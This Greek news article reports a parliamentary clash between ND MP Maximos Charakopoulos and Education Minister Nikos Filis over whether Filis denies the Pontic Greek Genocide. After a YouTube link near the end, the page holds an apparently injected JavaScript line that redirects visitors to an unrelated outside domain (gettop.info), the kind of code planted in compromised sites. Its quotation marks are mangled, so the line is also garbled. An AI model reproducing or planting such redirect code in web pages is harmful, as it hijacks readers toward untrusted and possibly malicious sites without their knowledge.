Κόντρα μεταξύ Φίλη-Χαρακόπουλου για τη Γενοκτονία των Ποντίων (BINTEO)

0
5

 

Άγρια αντιπαράθεση σημειώθηκε στη Βουλή μεταξύ του Μάξιμου Χαρακόπουλου της ΝΔ και του Νίκου Φίλη, υπουργού Παιδείας και βουλευτή του ΣΥΡΙΖΑ με φόντο τη Γενοκτονία των Ποντίων και τη Μικρασιατική Καταστροφή.

Ο καυγάς ξεκίνησε όταν ο βουλευτής της Νέας Δημοκρατίας συνέδεσε την Ημέρα Εθνικής Μνήμης για την καταστροφή του Μικρασιατικού Ελληνισμού, όπου διεξάγεται συζήτηση σήμερα στη Βουλή, με τη γενοκτονία του Ποντιακού Ελληνισμού.

Ο κ. Φίλης κατηγόρησε τον κ. Χαρακόπουλο ότι βρίσκεται σε διατεταγμένη υπηρεσία από το κόμμα του για τη «δολοφονία χαρακτήρων», αντιδρώντας στους χαρακτηρισμούς του βουλευτή της ΝΔ που είπε ότι ο υπουργός είναι αρνητής της Γενοκτονίας καθώς στο παρελθόν ο κ. Φίλης είχε χρησιμοποιήσει τον όρο εθνοκάθαρση για τη Γενοκτονία.

«Η άρνηση της Γενοκτονίας των Ποντίων από τον κ. Φίλη θα τον ακολουθεί κι όταν φύγει και θα χρησιμοποιείται από τους Τούρκους», ανέφερε ο κ. Χαρακόπουλος προκαλώντας την έντονη αντίδραση του υπουργού Παιδείας. «Είσαι προκλητικός. Λυπάμαι που ο εκπρόσωπος της αξιωματικής αντιπολίτευσης προσπάθησε να μετατρέψει τη σημερινή συζήτηση σε μια στείρα αντιπαράθεση. Εκτελεί διατεταγμένη υπηρεσία του κόμματός του. Είναι η στείρα τακτική της δολοφονίας χαρακτήρων. Αυτή η πρακτική τακτική δεν έχει σχέση με την εθνική ενότητα», υπογράμμισε ο κ. Φίλης.

Ο υπουργός Παιδείας απέρριψε παράλληλα τους ισχυρισμούς ότι αφαίρεσε από τα σχολικά βιβλία τα κεφάλαια για τη Μικρασιατική Καταστροφή, τονίζοντας ότι αυτά και υπάρχουν και διδάσκονται, απλά δεν συμπεριλαμβάνονται στην εξεταστέα ύλη.

https://www.youtube.com/watch?v=7XUh148UyLo setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here